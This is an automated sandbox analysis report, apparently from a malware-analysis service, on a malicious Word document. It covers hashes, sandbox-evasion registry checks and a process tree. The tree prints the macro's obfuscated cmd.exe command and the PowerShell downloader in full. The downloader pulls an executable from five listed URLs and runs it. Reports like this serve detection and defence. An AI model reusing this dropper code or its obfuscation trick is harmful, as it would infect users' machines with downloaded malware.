Analysis
-
max time kernel
103s -
max time network
110s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
30-04-2024 00:03
Behavioral task
behavioral1
Sample
088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc
Resource
win10v2004-20240419-en
General
-
Target
088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc
-
Size
138KB
-
MD5
088e0aa1d899cc55046dcd2f1ae592a3
-
SHA1
b40b2f3cb411e37f55d101d9019a50666160ff7b
-
SHA256
302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb
-
SHA512
f60bf916c05b45be2f86a88571fa1d52ea0c4fd4170ccdaf1f26799280d2e14aa366c0e2e22a963f1485592cac3a5b5b662445c3239f6c65cddabe9380b9e644
-
SSDEEP
1536:dP981ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadk+aRbPJl21X/lnnF:d18GhDS0o9zTGOZD6EbzCdw32NhF
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4784 4084 cmd.exe 84 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4084 WINWORD.EXE 4084 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1176 powershell.exe 1176 powershell.exe 1636 powershell.exe 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4084 WINWORD.EXE 4084 WINWORD.EXE 4084 WINWORD.EXE 4084 WINWORD.EXE 4084 WINWORD.EXE 4084 WINWORD.EXE 4084 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4084 wrote to memory of 4784 4084 WINWORD.EXE 87 PID 4084 wrote to memory of 4784 4084 WINWORD.EXE 87 PID 4784 wrote to memory of 864 4784 cmd.exe 89 PID 4784 wrote to memory of 864 4784 cmd.exe 89 PID 4784 wrote to memory of 1680 4784 cmd.exe 90 PID 4784 wrote to memory of 1680 4784 cmd.exe 90 PID 1680 wrote to memory of 4836 1680 cmd.exe 91 PID 1680 wrote to memory of 4836 1680 cmd.exe 91 PID 4836 wrote to memory of 4792 4836 cmd.exe 92 PID 4836 wrote to memory of 4792 4836 cmd.exe 92 PID 4836 wrote to memory of 1064 4836 cmd.exe 93 PID 4836 wrote to memory of 1064 4836 cmd.exe 93 PID 1680 wrote to memory of 1176 1680 cmd.exe 94 PID 1680 wrote to memory of 1176 1680 cmd.exe 94 PID 1176 wrote to memory of 1636 1176 powershell.exe 95 PID 1176 wrote to memory of 1636 1176 powershell.exe 95
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pmet:vne$=XMC$;'OVL'=IZY$;'865' = wSw$;'TBZ'=jSP$;)'@'(tilpS.'FXXm1xSO/moc.oidutssdnimlacigam//:ptth@k98SL52Oqg/moc.stnapyknufcm//:ptth@lE9pfhVr/moc.namllimleahcim//:ptth@iqRsEeZTG/moc.zyobeniram//:ptth@pFksMeQWB/moc.dleifekaweram//:ptth'=sQD$;tneilCbeW.teN tcejbo-wen=ihP$;'HVk'=wiw$ llehsrewop&&for /L %b in (472,-1,0)do set uw=!uw!!D5:~%b,1!&&if %b equ 0 echo !uw:~-473! |FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^^^|findstr Cons')DO %5 -"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo powershell $wiw='kVH';$Phi=new-object Net.WebClient;$DQs='http://marewakefield.com/BWQeMskFp@http://marineboyz.com/GTZeEsRqi@http://michaelmillman.com/rVhfp9El@http://mcfunkypants.com/gqO25LS89k@http://magicalmindsstudio.com/OSx1mXXF'.Split('@');$PSj='ZBT';$wSw = '568';$YZI='LVO';$CMX=$env:temp+'\'+$wSw+'.exe';foreach($qYv in $DQs){try{$Phi.DownloadFile($qYv, $CMX);$OYq='rtu';If ((Get-Item $CMX).length -ge 80000) {Invoke-Item $CMX;$jbl='MQi';break;}}catch{}}$uGY='AJA'; "3⤵PID:864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^|findstr Cons') DO %5 -"3⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ftype|findstr Cons4⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ftype"5⤵PID:4792
-
-
C:\Windows\system32\findstr.exefindstr Cons5⤵PID:1064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =kVH5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82